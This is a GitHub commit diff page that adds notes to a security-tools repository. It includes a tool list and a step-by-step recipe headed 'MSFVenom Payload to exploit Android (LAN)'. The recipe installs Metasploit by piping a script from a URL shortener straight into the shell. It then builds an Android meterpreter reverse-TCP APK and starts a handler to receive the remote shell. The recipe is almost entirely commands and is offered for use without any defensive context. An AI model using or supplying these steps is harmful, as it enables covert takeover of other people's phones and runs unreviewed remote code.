-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
12 changed files
with
31 additions
and
369 deletions.
There are no files selected for viewing
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,8 @@ | ||
# Cyber Security Tools | ||
|
||
- gobuster : Gobuster is a tool used in penetration testing and cybersecurity assessments. It's primarily designed for discovering web content, directories, and files on web servers. | ||
- pdfinfo : Portable Document Format (PDF) document information extractor (poppler-utils) | ||
- exiftool : ExifTool is used to read and write metadata in various file types, such as JPEG images. | ||
- sqlmap : SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities in web applications. | ||
- crunch : Crunch command generates wordlists based on specified character sets, minimum and maximum lengths, and specific patterns. These wordlists can be used for dictionary attacks. | ||
- jSQL : |
File renamed without changes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,23 @@ | ||
# MSFVenom Payload to exploit Android (LAN) | ||
|
||
# Install Metasploit Framework in Termux | ||
source <(curl -fsSL https://kutt.it/msf) | ||
|
||
# Create MSFVenom Payload | ||
msfvenom -p android/meterpreter/reverse_tcp LHOST=<localhost_ip_receive> LPORT=<localhost_port_listen> R app_name.apk | ||
|
||
# Start Metasploit Console | ||
msfconsole | ||
|
||
# Set Listener on Metasploit | ||
use exploit/multi/handler | ||
|
||
# Set Reverse Payload | ||
set payload android/meterpreter/reverse_tcp | ||
|
||
# Set localhost IP to receive and port to listen connections | ||
set LHOST=<Receive_IP> | ||
LPORT=<Receive_Port> | ||
|
||
# Start the listener | ||
run / exploit |
File renamed without changes.
This file was deleted.
Oops, something went wrong.
This file was deleted.
Oops, something went wrong.
Oops, something went wrong.